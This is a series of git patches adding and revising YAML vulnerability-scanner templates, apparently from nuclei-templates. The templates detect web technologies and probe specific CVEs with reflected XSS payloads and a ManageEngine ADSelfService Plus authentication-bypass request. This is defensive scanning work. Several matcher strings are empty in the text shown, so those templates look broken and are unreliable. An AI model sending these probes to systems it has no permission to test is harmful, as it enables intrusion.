https://nvd.nist.gov/vuln/detail/CVE-2019-7543 + tags: cves,cve2019,kindeditor,xss + +requests: + - method: POST + path: + - '{{BaseURL}/kindeditor/php/demo.php' + headers: + Content-Type: application/x-www-form-urlencoded + + body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html From f9fa1b75b33866a826c7e42d22874a00eedc6467 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 10:51:42 +0700 Subject: [PATCH 309/339] Create php-proxy-detect.yaml --- technologies/php-proxy-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/php-proxy-detect.yaml diff --git a/technologies/php-proxy-detect.yaml b/technologies/php-proxy-detect.yaml new file mode 100644 index 0000000000..bd3e98a6fd --- /dev/null +++ b/technologies/php-proxy-detect.yaml @@ -0,0 +1,25 @@ +id: php-proxy-detect + +info: + name: PHP Proxy Detect + author: pikpikcu + severity: info + tags: tech,php + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/proxy" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "PHP-Proxy" + + - type: status + status: + - 200 From 20cddde737901c2beb5526d568cf1272c58ba1a3 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:01:39 +0700 Subject: [PATCH 310/339] Create CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2016/CVE-2016-8527.yaml diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml new file mode 100644 index 0000000000..2e88470258 --- /dev/null +++ b/cves/2016/CVE-2016-8527.yaml @@ -0,0 +1,33 @@ +id: CVE-2016-8527 + +info: + name: Aruba Airwave - (XSS) + author: pikpikcu + severity: medium + description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). + reference: + - https://www.exploit-db.com/exploits/41482 + - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 + tags: cves,cve2016,aruba,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(document.domain)'%2f%3e%3c%2fa%3e&end=500&match" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - 'Content-Type: text/html' + part: header From 3e2c882d84a8f90417fc55379f6c16bcafb1b6cd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:07:34 +0700 Subject: [PATCH 311/339] Create CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-40539.yaml diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml new file mode 100644 index 0000000000..2c5dbfd0b1 --- /dev/null +++ b/cves/2021/CVE-2021-40539.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-40539 + +info: + name: Zoho ManageEngine ADSelfService Plus version 6113 Unauthenticated RCE + author: daffainfo + severity: critical + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. + tags: cve,cve2021,rce,zoho + reference: + - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 + +requests: + + - raw: + - | + POST /RestAPI/LogonCustomization HTTP/1.1 + Host: 172.16.57.9 + Content-Type: application/x-www-form-urlencoded + Content-Length: 27 + + methodToCall=previewMobLogo + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 From cd4eff06ecb637615a8cd08e21b249acb48137cc Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:18:34 +0700 Subject: [PATCH 312/339] Create gitea-detect.yaml --- technologies/gitea-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/gitea-detect.yaml diff --git a/technologies/gitea-detect.yaml b/technologies/gitea-detect.yaml new file mode 100644 index 0000000000..e17960b43a --- /dev/null +++ b/technologies/gitea-detect.yaml @@ -0,0 +1,25 @@ +id: gitea-detect + +info: + name: Gitea Detect + author: pikpikcu + severity: info + tags: tech,gitea + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/user/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Powered by Gitea" + + - type: status + status: + - 200 From 57bdb750542a5c3bb991dd010f6e0f128ab6a49c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 16 Sep 2021 11:34:31 +0700 Subject: [PATCH 313/339] Create elfinder-detect.yaml --- technologies/elfinder-detect.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 technologies/elfinder-detect.yaml diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml new file mode 100644 index 0000000000..53e207dae4 --- /dev/null +++ b/technologies/elfinder-detect.yaml @@ -0,0 +1,26 @@ +id: elfinder-detect + +info: + name: elFinder Detect + author: pikpikcu + severity: info + tags: tech,elfinder + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/php/connector.minimal.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "" + - '{"error":["errUnknownCmd"]}' + + - type: status + status: + - 200 From da9e13223267f1591a6532a6f7e6cf5e230c1966 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 16 Sep 2021 16:10:20 +0700 Subject: [PATCH 314/339] Update CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 2c5dbfd0b1..99127daa41 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -15,7 +15,7 @@ requests: - raw: - | POST /RestAPI/LogonCustomization HTTP/1.1 - Host: 172.16.57.9 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: 27 From 58697d30dc76d09962b92d048df1a4996e54af34 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Thu, 16 Sep 2021 15:09:33 +0530 Subject: [PATCH 315/339] Update azure-takeover-detection.yaml --- dns/azure-takeover-detection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 67bee6345b..c3191cdd0a 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -44,6 +44,7 @@ dns: - type: word words: - "NXDOMAIN" + extractors: - type: regex group: 1 From 279d0234ac80169eaa3e00a1163a6bedb55a1d24 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:27:49 +0530 Subject: [PATCH 316/339] Update dir-listing.yaml --- miscellaneous/dir-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml index 15c5c11756..18562b5341 100644 --- a/miscellaneous/dir-listing.yaml +++ b/miscellaneous/dir-listing.yaml @@ -4,6 +4,7 @@ info: name: Directory listing enabled author: _harleo,pentest_swissky severity: info + reference: https://portswigger.net/kb/issues/00600100_directory-listing tags: misc,generic requests: From 47433f207b0ed4f20f5d43257846515b952b8bcd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:33:13 +0530 Subject: [PATCH 317/339] Update elfinder-detect.yaml --- technologies/elfinder-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/elfinder-detect.yaml b/technologies/elfinder-detect.yaml index 53e207dae4..4b2dbbccc8 100644 --- a/technologies/elfinder-detect.yaml +++ b/technologies/elfinder-detect.yaml @@ -10,8 +10,9 @@ requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}/php/connector.minimal.php" + - "{{BaseURL}}/elfinder.html" + stop-at-first-match: true matchers-condition: and matchers: @@ -19,7 +20,6 @@ requests: part: body words: - "" - - '{"error":["errUnknownCmd"]}' - type: status status: From 47b99dc20d9df165521996858b482afd17a8f8bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 17:43:04 +0530 Subject: [PATCH 318/339] Update gitea-detect.yaml --- technologies/gitea-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/gitea-detect.yaml b/technologies/gitea-detect.yaml index e17960b43a..965db9b3eb 100644 --- a/technologies/gitea-detect.yaml +++ b/technologies/gitea-detect.yaml @@ -12,6 +12,7 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/user/login" + stop-at-first-match: true matchers-condition: and matchers: @@ -23,3 +24,9 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - "Powered by Gitea Version: ([0-9.]+)" From 55d676dc77d54b41ffe21446c8769ff7fedb3dbb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:18:51 +0530 Subject: [PATCH 319/339] Update CVE-2021-40539.yaml --- cves/2021/CVE-2021-40539.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index 99127daa41..d90c9cb621 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -5,16 +5,16 @@ info: author: daffainfo severity: critical description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. - tags: cve,cve2021,rce,zoho reference: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 + tags: cve,cve2021,rce,zoho requests: - raw: - | - POST /RestAPI/LogonCustomization HTTP/1.1 + POST /./RestAPI/LogonCustomization HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Content-Length: 27 From cd98f1dcc7e317477fd3796fd4dd5a430eb0687e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:19:49 +0530 Subject: [PATCH 320/339] Update CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 2e88470258..828f85d642 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -4,7 +4,7 @@ info: name: Aruba Airwave - (XSS) author: pikpikcu severity: medium - description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). + description: Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). reference: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 From d0f5daca610eea29a9171330170186838ee2c8d3 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 16 Sep 2021 16:04:04 +0300 Subject: [PATCH 321/339] #276 Replace space character with dash in template ID. --- cves/2020/CVE-2020-6171.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml index 1e99f11860..aa04aa85bd 100644 --- a/cves/2020/CVE-2020-6171.yaml +++ b/cves/2020/CVE-2020-6171.yaml @@ -1,4 +1,4 @@ -id: CVE 2020-6171 +id: CVE-2020-6171 info: name: CLink Office v2 XSS From 7542ad2c07f4fe6f47c66eb951cfa577ad193982 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:05:34 +0000 Subject: [PATCH 322/339] Auto Generated CVE annotations [Thu Sep 16 13:05:34 UTC 2021] :robot: --- cves/2020/CVE-2020-6171.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-6171.yaml b/cves/2020/CVE-2020-6171.yaml index aa04aa85bd..2e680f0de1 100644 --- a/cves/2020/CVE-2020-6171.yaml +++ b/cves/2020/CVE-2020-6171.yaml @@ -8,6 +8,11 @@ info: A cross-site scripting (XSS) vulnerability in the index page of the CLink Office 2.0 management console allows remote attackers to inject arbitrary web script or HTML via the lang parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-6171 tags: cve,cve2020,xss,clink-office + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-6171 + cwe-id: CWE-79 requests: - method: GET From 8cee3ae73bb3b752c96a42bf329842320efc41f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:42:19 +0530 Subject: [PATCH 323/339] Update CVE-2016-8527.yaml --- cves/2016/CVE-2016-8527.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 828f85d642..94470343ec 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -13,14 +13,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(document.domain)'%2f%3e%3c%2fa%3e&end=500&match" + - "{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: status @@ -28,6 +28,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From 77c3dc36ac7df4c04e3ff7cd97f5f63ec8dc7311 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:13:57 +0000 Subject: [PATCH 324/339] Auto Generated CVE annotations [Thu Sep 16 13:13:57 UTC 2021] :robot: --- cves/2021/CVE-2021-40539.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml index d90c9cb621..0da6945312 100644 --- a/cves/2021/CVE-2021-40539.yaml +++ b/cves/2021/CVE-2021-40539.yaml @@ -9,6 +9,11 @@ info: - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539 tags: cve,cve2021,rce,zoho + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-40539 + cwe-id: CWE-287 requests: From d8776d389f8b59ecc261957b4acb8355bc0975aa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 18:49:01 +0530 Subject: [PATCH 325/339] Update php-proxy-detect.yaml --- technologies/php-proxy-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/technologies/php-proxy-detect.yaml b/technologies/php-proxy-detect.yaml index bd3e98a6fd..fb898af353 100644 --- a/technologies/php-proxy-detect.yaml +++ b/technologies/php-proxy-detect.yaml @@ -23,3 +23,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'PHP\-Proxy<\/a> ([0-9.]+)<\/div>' From 18ab41c89a71719a5e566966b00a46a49a0e7a23 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 13:20:40 +0000 Subject: [PATCH 326/339] Auto Generated CVE annotations [Thu Sep 16 13:20:40 UTC 2021] :robot: --- cves/2016/CVE-2016-8527.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-8527.yaml b/cves/2016/CVE-2016-8527.yaml index 94470343ec..efc62d3bd6 100644 --- a/cves/2016/CVE-2016-8527.yaml +++ b/cves/2016/CVE-2016-8527.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/41482 - https://nvd.nist.gov/vuln/detail/CVE-2016-8527 tags: cves,cve2016,aruba,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-8527 + cwe-id: CWE-79 requests: - method: GET From 4984b42e66b2c51d1ea89bffad47360d42e55910 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 21:28:19 +0530 Subject: [PATCH 327/339] Update CVE-2019-7543.yaml --- cves/2019/CVE-2019-7543.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index a3c1d32ec5..e9ce1b1915 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -13,18 +13,18 @@ info: requests: - method: POST path: - - '{{BaseURL}/kindeditor/php/demo.php' + - '{{BaseURL}}/kindeditor/php/demo.php' + - '{{BaseURL}}/php/demo.php' + body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" headers: Content-Type: application/x-www-form-urlencoded - body: "content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9" - matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word From 4926c9174cc397130c4ded51f416eec8220a75d9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 16 Sep 2021 21:43:58 +0530 Subject: [PATCH 328/339] misc update --- technologies/getsimple-cms-detect.yaml | 7 ++++++- technologies/getsimple-cms-detector.yaml | 22 ---------------------- 2 files changed, 6 insertions(+), 23 deletions(-) delete mode 100644 technologies/getsimple-cms-detector.yaml diff --git a/technologies/getsimple-cms-detect.yaml b/technologies/getsimple-cms-detect.yaml index 931a074037..9f6dab6f06 100644 --- a/technologies/getsimple-cms-detect.yaml +++ b/technologies/getsimple-cms-detect.yaml @@ -2,15 +2,18 @@ id: getsimple-cms-detect info: name: GetSimple CMS Detection - author: pikpikcu + author: pikpikcu,philippedelteil severity: info tags: tech,getsimple + description: Template to detect a running GetSimple CMS instance requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/readme.txt" + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -20,4 +23,6 @@ requests: - type: word words: - "Powered by GetSimple" + - 'GetSimple CMS is a flatfile CMS' part: body + condition: or \ No newline at end of file diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml deleted file mode 100644 index 95ed07e8c1..0000000000 --- a/technologies/getsimple-cms-detector.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: getsimple-cms-detector - -info: - name: GetSimple CMS Detector - author: philippedelteil - severity: info - description: With this template we can detect a running GetSimple CMS instance - tags: getsimple,tech -requests: - - method: GET - path: - - "{{BaseURL}}/readme.txt" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'GetSimple CMS is a flatfile CMS' - - type: status - part: header - status: - - 200 From 0dd6d4a6b414a1f98f0f76a88c0268bdd2032223 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 16:58:29 +0000 Subject: [PATCH 329/339] Auto Generated CVE annotations [Thu Sep 16 16:58:29 UTC 2021] :robot: --- cves/2019/CVE-2019-13392.yaml | 5 +++++ cves/2019/CVE-2019-7543.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2019/CVE-2019-13392.yaml b/cves/2019/CVE-2019-13392.yaml index fe641a6446..2bc429135d 100644 --- a/cves/2019/CVE-2019-13392.yaml +++ b/cves/2019/CVE-2019-13392.yaml @@ -9,6 +9,11 @@ info: - https://www.doyler.net/security-not-included/natemail-vulnerabilities - https://nvd.nist.gov/vuln/detail/CVE-2019-13392 tags: cves,cve2019,natemail,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-13392 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml index e9ce1b1915..4ce8628577 100644 --- a/cves/2019/CVE-2019-7543.yaml +++ b/cves/2019/CVE-2019-7543.yaml @@ -9,6 +9,11 @@ info: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 tags: cves,cve2019,kindeditor,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7543 + cwe-id: CWE-79 requests: - method: POST From d3c6985d3ebf87fc40c4173797c76c4040cff79c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:31:41 +0530 Subject: [PATCH 330/339] Update CVE-2021-35265.yaml --- cves/2021/CVE-2021-35265.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index bbdb198b8a..a90ef3066c 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -4,7 +4,7 @@ info: name: MaxSite CMS XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. + description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page. reference: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 @@ -13,21 +13,21 @@ info: requests: - method: GET path: - - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' - - '{{BaseURL}}/maxsite/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E' + - '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - '">' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From c40be75a1395186198349f608063d5bf4ba5226d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:04:58 +0000 Subject: [PATCH 331/339] Auto Generated CVE annotations [Thu Sep 16 17:04:58 UTC 2021] :robot: --- cves/2021/CVE-2021-35265.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-35265.yaml b/cves/2021/CVE-2021-35265.yaml index a90ef3066c..5217c1c155 100644 --- a/cves/2021/CVE-2021-35265.yaml +++ b/cves/2021/CVE-2021-35265.yaml @@ -9,6 +9,11 @@ info: - https://github.com/maxsite/cms/issues/414#issue-726249183 - https://nvd.nist.gov/vuln/detail/CVE-2021-35265 tags: cves,cve2021,maxsite,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-35265 + cwe-id: CWE-79 requests: - method: GET From ac93a8acaf18fa157fb1c5f8a736a4e942d9149b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:46:36 +0530 Subject: [PATCH 332/339] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 8d87b74364..ddd8a322ce 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - tags: cves,cve2021,wordpress,xss + tags: cves,cve2021,wordpress,xss,wp-theme requests: - raw: @@ -17,21 +17,21 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - - action=tie_ajax_search&query[]= + + action=tie_ajax_search&query[]= matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 684d541115c31a1cf864ce97fcf1446e19a25723 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:51:27 +0530 Subject: [PATCH 333/339] Update CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index 8d02f10378..b4f2434d35 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -8,25 +8,25 @@ info: reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 - tags: cves,cve2021,wordpress,xss + tags: cve,cve2021,wordpress,xss,wp-theme requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275\">%27%2C%27custom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 14dd731ba200263ac70aa88eab3785bf88c7a6dc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:51:39 +0530 Subject: [PATCH 334/339] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index ddd8a322ce..98f6fd96aa 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - tags: cves,cve2021,wordpress,xss,wp-theme + tags: cve,cve2021,wordpress,xss,wp-theme requests: - raw: From 1ba6b92a13a5e09e674f4adacd9462b12b4ea491 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:58:05 +0530 Subject: [PATCH 335/339] Update CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index da7b18b64c..4b98f8b51a 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -4,32 +4,33 @@ info: name: Hotel Druid 3.0.2 XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - tags: cves,cve2021,hotel-druid,xss + tags: cve,cve2021,hoteldruid,xss requests: - method: GET path: - - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' - - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' - - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' - - 